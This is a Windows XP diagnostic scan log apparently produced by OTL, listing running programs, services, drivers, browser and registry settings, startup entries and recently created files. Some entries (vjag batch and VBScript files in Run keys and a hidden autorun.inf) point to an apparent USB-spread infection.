[2009/04/02 05:00:33 | 00,393,216 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\sdcservice.exe
[2008/11/24 22:31:10 | 29,263,712 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
[2004/10/14 14:42:54 | 01,404,928 | ---- | M] (Analog Devices, Inc.) -- C:\Program Files\Analog Devices\Core\smax4pnp.exe
[2005/10/14 14:46:34 | 00,077,824 | ---- | M] (Intel Corporation) -- C:\WINDOWS\system32\hkcmd.exe
[2005/10/14 14:50:30 | 00,114,688 | ---- | M] (Intel Corporation) -- C:\WINDOWS\system32\igfxpers.exe
[2006/11/03 19:20:12 | 00,866,584 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Windows Defender\MSASCui.exe
[2008/03/30 10:36:40 | 00,267,048 | ---- | M] (Apple Inc.) -- C:\Program Files\iTunes\iTunesHelper.exe
[2004/07/27 16:50:18 | 00,081,920 | ---- | M] (InstallShield Software Corporation) -- C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe
[2006/10/20 17:23:38 | 00,118,784 | ---- | M] (CyberLink Corp.) -- C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe
[2008/05/08 06:24:44 | 00,155,648 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\wscript.exe
[2009/03/09 05:19:17 | 00,148,888 | ---- | M] (Sun Microsystems, Inc.) -- C:\Program Files\Java\jre6\bin\jusched.exe
[2009/03/05 16:07:20 | 02,260,480 | RHS- | M] (Safer-Networking Ltd.) -- C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
[2009/01/28 07:24:29 | 00,245,760 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\AutoUpdate\ALMon.exe
[2007/11/02 05:48:46 | 04,519,176 | ---- | M] (SMART Technologies Inc.) -- C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardTools.exe
[2007/11/02 05:48:34 | 02,090,248 | ---- | M] (SMART Technologies Inc.) -- C:\Program Files\SMART Technologies Inc\SMART Board Software\Aware.exe
[2007/11/02 05:48:40 | 03,990,792 | ---- | M] (SMART Technologies Inc.) -- C:\Program Files\SMART Technologies Inc\SMART Board Software\Marker.exe
[2008/03/30 10:36:30 | 00,504,104 | ---- | M] (Apple Inc.) -- C:\Program Files\iPod\bin\iPodService.exe
[2009/04/02 13:33:26 | 00,422,912 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\administrator.VVIEW\desktop\powerpnt.exe.exe

========== (O23) Win32 Services ==========

[2008/02/18 11:16:30 | 00,110,592 | ---- | M] (Apple, Inc.) -- C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe -- (Apple Mobile Device [Auto | Running])
[2007/10/24 01:47:22 | 00,033,800 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe -- (aspnet_state [On_Demand | Stopped])
[2008/01/11 17:50:16 | 00,030,312 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe -- (BcmSqlStartupSvc [Auto | Running])
[2007/07/24 15:17:08 | 00,229,376 | ---- | M] (Apple Inc.) -- C:\Program Files\Bonjour\mDNSResponder.exe -- (Bonjour Service [Auto | Running])
[2007/10/24 01:47:40 | 00,070,144 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32 [On_Demand | Stopped])
[2005/08/10 16:58:18 | 00,491,520 | ---- | M] () -- C:\WINDOWS\system32\DKabcoms.exe -- (dkab_device [On_Demand | Stopped])
[2007/10/09 12:58:12 | 00,036,864 | ---- | M] (Microsoft Corporation) -- c:\WINDOWS\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe -- (FontCache3.0.0.0 [On_Demand | Stopped])
[2007/10/11 09:55:10 | 00,864,256 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe -- (idsvc [Unknown | Stopped])
[2008/03/30 10:36:30 | 00,504,104 | ---- | M] (Apple Inc.) -- C:\Program Files\iPod\bin\iPodService.exe -- (iPod Service [On_Demand | Running])
[2009/03/09 05:19:15 | 00,152,984 | ---- | M] (Sun Microsystems, Inc.) -- C:\Program Files\Java\jre6\bin\jqs.exe -- (JavaQuickStarterService [Auto | Running])
[2003/06/19 23:25:00 | 00,322,120 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE -- (MDM [Auto | Running])
[2008/11/24 22:31:10 | 29,263,712 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe -- (MSSQL$MSSMLBIZ [On_Demand | Running])
[2008/11/24 22:31:08 | 00,045,408 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\90\Shared\sqladhlp90.exe -- (MSSQLServerADHelper [Disabled | Stopped])
[2007/10/11 09:55:14 | 00,122,880 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe -- (NetTcpPortSharing [Disabled | Stopped])
[2007/08/24 03:19:12 | 00,443,776 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE -- (odserv [On_Demand | Stopped])
[2006/10/26 14:03:08 | 00,145,184 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE -- (ose [On_Demand | Stopped])
[2008/10/27 09:14:03 | 00,069,632 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\SAVAdminService.exe -- (SAVAdminService [Unknown | Running])
[2008/09/24 15:52:08 | 00,098,304 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\SavService.exe -- (SAVService [Unknown | Running])
[2007/11/02 05:48:32 | 01,283,336 | ---- | M] (SMART Technologies Inc.) -- C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardService.exe -- (SMART Board Service [Auto | Running])
[2007/11/02 05:48:58 | 00,767,240 | ---- | M] () -- C:\Program Files\SMART Technologies Inc\SMART Board Software\WebServer.exe -- (SMART Web Server [On_Demand | Stopped])
[2009/04/02 05:00:20 | 00,266,240 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Remote Management System\ManagementAgentNT.exe -- (Sophos Agent [Auto | Running])
[2009/01/28 07:24:29 | 00,172,032 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\AutoUpdate\ALsvc.exe -- (Sophos AutoUpdate Service [Auto | Running])
[2009/04/02 05:00:33 | 00,393,216 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\sdcservice.exe -- (Sophos Device Control Service [Unknown | Running])
[2009/04/02 05:00:16 | 00,794,624 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Remote Management System\RouterNT.exe -- (Sophos Message Router [Auto | Running])
[2008/11/24 22:31:08 | 00,239,968 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe -- (SQLBrowser [Auto | Running])
[2008/11/24 22:31:12 | 00,087,904 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe -- (SQLWriter [Auto | Running])
[2008/08/07 14:48:30 | 00,192,512 | ---- | M] (Lightspeed Systems) -- C:\Program Files\Lightspeed Systems\User Agent\UAService.exe -- (UAService [Auto | Running])
[2006/11/03 19:19:58 | 00,013,592 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Windows Defender\MsMpEng.exe -- (WinDefend [Auto | Running])
[2006/10/18 20:05:24 | 00,913,408 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Windows Media Player\wmpnetwk.exe -- (WMPNetworkSvc [On_Demand | Stopped])

========== Driver Services ==========

[2005/03/17 16:30:10 | 00,132,608 | ---- | M] (Broadcom Corporation) -- C:\WINDOWS\system32\drivers\b57xp32.sys -- (b57w2k [On_Demand | Running])
[2004/12/13 16:14:00 | 00,039,904 | ---- | M] (Adaptec, Inc.) -- C:\WINDOWS\System32\drivers\cercsr6.sys -- (cercsr6 [Boot | Stopped])
[2008/01/29 12:01:28 | 00,016,168 | ---- | M] (GEAR Software Inc.) -- C:\WINDOWS\system32\drivers\GEARAspiWDM.sys -- (GEARAspiWDM [On_Demand | Running])
[2005/10/14 15:15:18 | 01,302,812 | ---- | M] (Intel Corporation) -- C:\WINDOWS\system32\drivers\ialmnt5.sys -- (ialm [On_Demand | Running])
[2008/04/14 00:09:50 | 00,014,592 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\drivers\kbdhid.sys -- (kbdhid [System | Running])
[2007/04/02 16:02:02 | 00,072,576 | ---- | M] (Mars Semiconductor Corp.) -- C:\WINDOWS\system32\drivers\marsqx5.sys -- (marsqx5 [On_Demand | Stopped])
[2004/08/04 05:00:00 | 00,017,792 | ---- | M] (Parallel Technologies, Inc.) -- C:\WINDOWS\system32\drivers\ptilink.sys -- (Ptilink [On_Demand | Running])
[2009/02/26 06:02:37 | 00,110,848 | ---- | M] (Sophos Plc) -- C:\WINDOWS\system32\drivers\savonaccesscontrol.sys -- (SAVOnAccessControl [System | Running])
[2009/02/26 06:02:48 | 00,038,528 | ---- | M] (Sophos Plc) -- C:\WINDOWS\system32\drivers\savonaccessfilter.sys -- (SAVOnAccessFilter [System | Running])
[2007/11/13 05:25:53 | 00,020,480 | ---- | M] (Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.) -- C:\WINDOWS\system32\drivers\secdrv.sys -- (Secdrv [On_Demand | Stopped])
[2004/09/17 09:02:54 | 00,732,928 | ---- | M] (Creative Technology Ltd.) -- C:\WINDOWS\system32\drivers\senfilt.sys -- (senfilt [On_Demand | Running])
[2005/01/27 15:31:06 | 00,260,352 | ---- | M] (Analog Devices, Inc.) -- C:\WINDOWS\system32\drivers\smwdm.sys -- (smwdm [On_Demand | Running])
[2008/09/24 18:09:37 | 00,014,976 | ---- | M] (Sophos Plc) -- C:\WINDOWS\system32\drivers\SophosBootDriver.sys -- (SophosBootDriver [Disabled | Stopped])

========== (R ) Internet Explorer ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Default_Page_URL"=http://www.vview.net
"Default_Search_URL"=http://go.microsoft.com/fwlink/?LinkId=54896
"Default_Secondary_Page_URL"=
"Extensions Off Page"=about:NoAdd-ons
"Local Page"=%SystemRoot%\system32\blank.htm
"Search Page"=http://go.microsoft.com/fwlink/?LinkId=54896
"Security Risk Page"=about:SecurityRisk
"Start Page"=http://go.microsoft.com/fwlink/?LinkId=69157

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search]
"CustomizeSearch"=http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchcust.htm
"SearchAssistant"=http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchasst.htm

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main]
"Search Page"=http://go.microsoft.com/fwlink/?LinkId=54896
"Start Page"=http://go.microsoft.com/fwlink/?LinkId=69157

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\URLSearchHooks]
"{CFBFAE00-17A6-11D0-99CB-00C04FD64497}" (HKLM) -- C:\WINDOWS\system32\ieframe.dll (Microsoft Corporation)

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = 0

[HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\Main]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = 0

[HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Internet Explorer\Main]

[HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = 0

[HKEY_USERS\S-1-5-19\SOFTWARE\Microsoft\Internet Explorer\Main]

[HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\Main]

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-1115\SOFTWARE\Microsoft\Internet Explorer\Main]
"Local Page"=C:\WINDOWS\system32\blank.htm
"Search Page"=http://go.microsoft.com/fwlink/?LinkId=54896
"Start Page"=http://go.microsoft.com/fwlink/?LinkId=69157

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-1115\Software\Microsoft\Internet Explorer\URLSearchHooks]
"{CFBFAE00-17A6-11D0-99CB-00C04FD64497}" (HKLM) -- C:\WINDOWS\system32\ieframe.dll (Microsoft Corporation)

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-1115\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = 0

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-500\SOFTWARE\Microsoft\Internet Explorer\Main]
"Search Page"=http://go.microsoft.com/fwlink/?LinkId=54896
"Start Page"=http://go.microsoft.com/fwlink/?LinkId=69157

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-500\Software\Microsoft\Internet Explorer\URLSearchHooks]
"{CFBFAE00-17A6-11D0-99CB-00C04FD64497}" (HKLM) -- C:\WINDOWS\system32\ieframe.dll (Microsoft Corporation)

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = 0

========== (O1) Hosts File ==========

HOSTS File = (734 bytes) - C:\WINDOWS\System32\drivers\etc\Hosts
First 25 entries...
127.0.0.1 localhost

========== (O2) BHO's ==========

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\]
{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} (HKLM) -- C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll (Adobe Systems Incorporated)
{201f27d4-3704-41d6-89c1-aa35e39143ed} (HKLM) -- C:\Program Files\AskBarDis\bar\bin\askBar.dll ()
{39EA7695-B3F2-4C44-A4BC-297ADA8FD235} (HKLM) -- C:\Program Files\Sophos\Sophos Anti-Virus\SophosBHO.dll (Sophos Plc)
{53707962-6F74-2D53-2644-206D7942484F} (HKLM) -- C:\Program Files\Spybot - Search & Destroy\SDHelper.dll (Safer Networking Limited)
{67BCF957-85FC-4036-8DC4-D4D80E00A77B} (HKLM) -- C:\Program Files\SMART Technologies Inc\Notebook Software\NotebookPlugin.dll (SMART Technologies Inc.)
{DBC80044-A445-435b-BC74-9C25C1C588A9} (HKLM) -- C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
{E7E6F031-17CE-4C07-BC86-EABFE594F69C} (HKLM) -- C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll (Sun Microsystems, Inc.)

========== (O3) Toolbars ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ToolBar]
"{3041d03e-fd4b-44e0-b742-2d9b88305f98}" (HKLM) -- C:\Program Files\AskBarDis\bar\bin\askBar.dll ()

========== (O4) Run Keys ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe Reader Speed Launcher"="C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe" (Adobe Systems Incorporated)
"igfxhkcmd"=C:\WINDOWS\system32\hkcmd.exe (Intel Corporation)
"igfxpers"=C:\WINDOWS\system32\igfxpers.exe (Intel Corporation)
"igfxtray"=C:\WINDOWS\system32\igfxtray.exe (Intel Corporation)
"ISUSPM Startup"=C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe -startup (InstallShield Software Corporation)
"ISUSScheduler"="C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe" -start (InstallShield Software Corporation)
"iTunesHelper"="C:\Program Files\iTunes\iTunesHelper.exe" (Apple Inc.)
"PDVDDXSrv"="C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe" (CyberLink Corp.)
"SoundMAXPnP"=C:\Program Files\Analog Devices\Core\smax4pnp.exe (Analog Devices, Inc.)
"SunJavaUpdateSched"="C:\Program Files\Java\jre6\bin\jusched.exe" (Sun Microsystems, Inc.)
"vjag"=C:\WINDOWS\system32\auto\vjag3.bat ()
"vjag2"=C:\WINDOWS\system32\auto\vjag.vbs ()
"Windows Defender"="C:\Program Files\Windows Defender\MSASCui.exe" -hide (Microsoft Corporation)

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SpybotSD TeaTimer"=C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe (Safer-Networking Ltd.)

[HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"DWQueuedReporting"="C:\PROGRA~1\COMMON~1\MICROS~1\DW\dwtrig20.exe" -t (Microsoft Corporation)

[HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"DWQueuedReporting"="C:\PROGRA~1\COMMON~1\MICROS~1\DW\dwtrig20.exe" -t (Microsoft Corporation)

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SpybotSD TeaTimer"=C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe (Safer-Networking Ltd.)

========== (O4) RunOnce Keys ==========

[HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"RunNarrator"=Narrator.exe (Microsoft Corporation)

[HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"RunNarrator"=Narrator.exe (Microsoft Corporation)

========== (O4) Startup Folders ==========

[2009/01/28 07:24:29 | 00,245,760 | ---- | M] (Sophos Plc) -- C:\Documents and Settings\All Users\Start Menu\Programs\Startup\AutoUpdate Monitor.lnk = C:\Program Files\Sophos\AutoUpdate\ALMon.exe
[2007/11/02 05:48:46 | 04,519,176 | ---- | M] (SMART Technologies Inc.) -- C:\Documents and Settings\All Users\Start Menu\Programs\Startup\SMART Board Tools.lnk = C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardTools.exe

========== (O6 & O7) Current Version Policies ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"HonorAutoRunSetting"=1

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System]
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1
"HideStartupScripts"=0

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

[HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

[HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

[HKEY_USERS\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

[HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-1115\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145
"Restrictrun"=1

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-1115\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\restrictrun]
"1"=vjag.vbs
"2"=C:\WINDOWS\system32\notepad.exe -- [2008/04/14 05:42:30 | 00,069,120 | ---- | M] (Microsoft Corporation)
"3"=winword.exe
"4"=C:\WINDOWS\explorer.exe -- [2008/04/14 05:42:20 | 01,033,728 | ---- | M] (Microsoft Corporation)
"5"=powerpnt.exe
"6"=vj.doc
"7"=excel.exe
"8"=vjag1.bat
"9"=vjag2.vbs
"10"=vjag.bat
"11"=vjag2.bat
"12"=vstart.bat
"13"=autorun.inf
"14"=C:\WINDOWS\system32\vjag.doc -- [2009/04/01 08:54:10 | 00,001,844 | -HS- | M] ()

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-500\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

========== (O9) IE Extensions ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\]
{92780B25-18CC-41C8-B9BE-3C9C571A8263}: Button: Research -- %ProgramFiles%\Microsoft Office\Office12\REFIEBAR.DLL [2006/10/26 20:12:22 | 00,040,424 | ---- | M] (Microsoft Corporation)
{DFB852A3-47F8-48C4-A200-58CAB36FD2A2}: Menu: Spybot - Search && Destroy Configuration -- %ProgramFiles%\Spybot - Search & Destroy\SDHelper.dll [2009/01/26 15:31:02 | 01,879,896 | ---- | M] (Safer Networking Limited)
{e2e2dd38-d088-4134-82b7-f2ba38496583}: Menu: @xpsp3res.dll,-20001 -- %SystemRoot%\network diagnostic\xpnetdiag.exe [2008/04/14 00:23:34 | 00,558,080 | ---- | M] (Microsoft Corporation)
{FB5F1910-F110-11d2-BB9E-00C04F795683}: Button: Messenger -- %ProgramFiles%\Messenger\msmsgs.exe [2008/04/14 05:42:30 | 01,695,232 | -HS- | M] (Microsoft Corporation)
{FB5F1910-F110-11d2-BB9E-00C04F795683}: Menu: Windows Messenger -- %ProgramFiles%\Messenger\msmsgs.exe [2008/04/14 05:42:30 | 01,695,232 | -HS- | M] (Microsoft Corporation)

[HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\Extensions\]
CmdMapping\\{FB5F1910-F110-11d2-BB9E-00C04F795683} [HKLM] -> %ProgramFiles%\Messenger\msmsgs.exe [Messenger] -> [2008/04/14 05:42:30 | 01,695,232 | -HS- | M] (Microsoft Corporation)

[HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Internet Explorer\Extensions\]
CmdMapping\\{FB5F1910-F110-11d2-BB9E-00C04F795683} [HKLM] -> %ProgramFiles%\Messenger\msmsgs.exe [Messenger] -> [2008/04/14 05:42:30 | 01,695,232 | -HS- | M] (Microsoft Corporation)

========== (O12) Internet Explorer Plugins ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Plugins\]
PluginsPage: "" = http://activex.microsoft.com/controls/find...=%s&mime=%s
PluginsPageFriendlyName: "" = Microsoft ActiveX Gallery

========== (O13) Default Prefixes ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\DefaultPrefix]
""=http://

========== (O15) Trusted Sites ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\]
1 domain(s) and sub-domain(s) not assigned to a zone.

========== (O16) DPF ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\]
{166B1BCA-3F9C-11CF-8075-444553540000}: http://fpdownload.macromedia.com/get/shock...director/sw.cab -- Shockwave ActiveX Control
{6414512B-B978-451D-A0D8-FCFDF33E833C}: http://www.update.microsoft.com/windowsupd...b?1207692023140 -- WUWebControl Class
{8AD9C840-044E-11D1-B3E9-00805F499D93}: http://java.sun.com/update/1.6.0/jinstall-...indows-i586.cab -- Java Plug-in 1.6.0_13
{8FFBE65D-2C9C-4669-84BD-5829DC0B603C}: http://fpdownload.macromedia.com/get/flash...t/ultrashim.cab -- Reg Error: Key does not exist or could not be opened.
{CAFEEFAC-0016-0000-0005-ABCDEFFEDCBA}: http://java.sun.com/update/1.6.0/jinstall-...indows-i586.cab -- Reg Error: Key does not exist or could not be opened.
{CAFEEFAC-0016-0000-0013-ABCDEFFEDCBA}: http://java.sun.com/update/1.6.0/jinstall-...indows-i586.cab -- Java Plug-in 1.6.0_13
{CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA}: http://java.sun.com/update/1.6.0/jinstall-...indows-i586.cab -- Java Plug-in 1.6.0_13

========== (O17) DNS Name Servers ==========

{29FD7304-5CDF-4582-9D6B-1D5C0F2E5860} (Servers: | Description: )
{346168FD-2809-4FCB-832C-E763CD35D89D} (Servers: | Description: Broadcom NetXtreme 57xx Gigabit Controller)

========== (O20) AppInit_DLLs ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_Dlls"=C:\PROGRA~1\Sophos\SOPHOS~1\SOPHOS~1.DLL
>[2009/04/02 05:00:31 | 00,164,864 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\sophos_detoured.dll

========== (O20) Winlogon Notify Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\]
igfxcui: "DllName" = igfxdev.dll -- C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)

========== Shell Execute Hooks ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{091EB208-39DD-417D-A5DD-7E2C2D8FB9CB}" (HKLM) -- C:\Program Files\Windows Defender\MpShHook.dll (Microsoft Corporation)

========== Safeboot Options ==========

"AlternateShell"=cmd.exe

========== CDRom AutoRun Settings ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom]
"AutoRun" = 1

========== Autorun Files on Drives ==========

auto []
[2009/03/20 08:56:44 | 00,000,000 | -HSD | M] -- C:\auto -- [ NTFS ]

AUTOEXEC.BAT []
[2008/04/08 16:45:12 | 00,000,000 | ---- | M] () -- C:\AUTOEXEC.BAT -- [ NTFS ]
Unable to obtain root file information for disk C:\

autorun.inf [[autorun] | shell=open | ]
[2001/06/19 06:18:46 | 00,000,021 | R--- | M] () -- D:\autorun.inf -- [ CDFS ]

========== MountPoints2 ==========

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{eea0ca55-325e-11dd-9de7-806d6172696f}\Shell]
""=Autorun

========== Files/Folders - Created Within 60 Days ==========

[1 C:\WINDOWS\System32\*.tmp files]
[6 C:\WINDOWS\*.tmp files]
[2009/04/02 14:59:20 | 00,401,720 | ---- | C] (Trend Micro Inc.) -- C:\HiJackThis.exe.exe
[2009/04/02 14:57:18 | 00,422,912 | ---- | C] (OldTimer Tools) -- C:\Documents and Settings\administrator.VVIEW\Desktop\powerpnt.exe.exe
[2009/04/01 13:49:56 | 04,840,017 | ---- | C] () -- C:\Documents and Settings\administrator.VVIEW\Desktop\Virus Script.rtf
[2009/04/01 13:34:39 | 00,000,000 | -H-D | C] -- C:\WINDOWS\System32\GroupPolicy
[2009/04/01 10:06:40 | 00,000,000 | ---D | C] -- C:\Documents and Settings\administrator.VVIEW\Application Data\Sun
[2009/04/01 09:50:54 | 00,000,000 | ---D | C] -- C:\Documents and Settings\administrator.VVIEW\Application Data\GlarySoft
[2009/04/01 09:49:15 | 00,000,000 | ---D | C] -- C:\Program Files\AskBarDis
[2009/04/01 09:49:15 | 00,000,000 | ---D | C] -- C:\Documents and Settings\administrator.VVIEW\Application Data\Mozilla
[2009/04/01 09:42:37 | 00,000,410 | ---- | C] () -- C:\WINDOWS\tasks\Schedule Task Weekly.job
[2009/04/01 09:42:31 | 00,000,000 | ---D | C] -- C:\Program Files\Registry Easy
[2009/04/01 09:15:17 | 00,000,000 | ---D | C] -- C:\Documents and Settings\administrator.VVIEW\Application Data\Auslogics
[2009/04/01 09:05:24 | 00,000,000 | ---- | C] () -- C:\WINDOWS\System32\MSVolume.dll
[2009/04/01 09:05:20 | 00,000,000 | ---D | C] -- C:\Program Files\Registry_Cleaner_Pro
[2009/04/01 09:02:08 | 00,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\TEMP
@Alternate Data Stream - 116 bytes -> C:\Documents and Settings\All Users\Application Data\TEMP:D1B5B4F1
[2009/04/01 09:02:00 | 00,000,000 | ---D | C] -- C:\Program Files\Registry Mechanic
[2009/04/01 08:54:48 | 00,000,162 | -H-- | C] () -- C:\WINDOWS\System32\~$vjag.doc
[2009/04/01 08:18:36 | 00,000,000 | ---D | C] -- C:\Program Files\Spybot - Search & Destroy
[2009/04/01 08:18:36 | 00,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Spybot - Search & Destroy
[2009/04/01 08:00:27 | 00,000,000 | ---D | C] -- C:\Documents and Settings\administrator.VVIEW\Application Data\Macromedia
[2009/04/01 07:57:50 | 00,000,000 | ---D | C] -- C:\Documents and Settings\administrator.VVIEW\Application Data\Adobe
[2009/03/31 16:26:03 | 00,000,000 | ---D | C] -- C:\Documents and Settings\administrator.VVIEW\Local Settings\Application Data\Sophos
[2009/03/31 16:25:00 | 00,000,000 | ---D | C] -- C:\Documents and Settings\administrator.VVIEW\Application Data\U3
[2009/03/20 09:03:58 | 02,442,498 | -HS- | C] () -- C:\autorun.inf
[2009/03/20 08:57:33 | 00,000,000 | -HSD | C] -- C:\auto
